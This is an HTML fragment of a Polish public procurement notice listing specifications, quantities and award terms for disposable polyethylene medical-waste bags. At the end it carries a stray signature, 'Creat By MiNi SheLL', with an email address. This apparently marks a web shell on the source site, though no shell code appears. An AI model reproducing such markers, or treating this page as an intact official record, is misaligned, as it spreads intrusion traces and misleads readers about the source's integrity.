<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.43.40-3, 39.22.43.10-4, 39.81.24.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WORKI FOLIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa towaru 	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w złotych	VAT w PLN	Wartość brutto w złotych	Nazwa katalogowa / numer handlowy
1	Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, ,nieprzezroczyste czerwone. Grubość - 0,07 mm, wym.600mm x1200mm. 1 rolka 25 szt. Zgrzewka -10 rolek.	18930000-7	rolka	1000						
2	    Worki jednorazowego użycia  na odpady medyczne z folii polietylenowej, nieprzezroczyste, czerwone, grubość 0,05 mm, wym. 500mm x 600 mm . 1 rolka 25 szt. Zgrzewka -20 rolek	18930000-7	rolka	960						
3	  Worki jednorazowego użycia  na odpady medyczne z folii polietylenowej, nieprzezroczyste, niebieskie. Grubość 0,05 mm, wym. 500mm x 600 mm . 1 rolka - 25 szt. Zgrzewka -20 rolek	18930000-7	rolka	1500						
4	 Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, nieprzezroczyste niebieskie.Grubość; 0,07mm,wym.600mm x 1200mm. 1 rolka -25 szt. Zgrzewka 10 rolek.	18930000-7	rolka	1100						
 	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com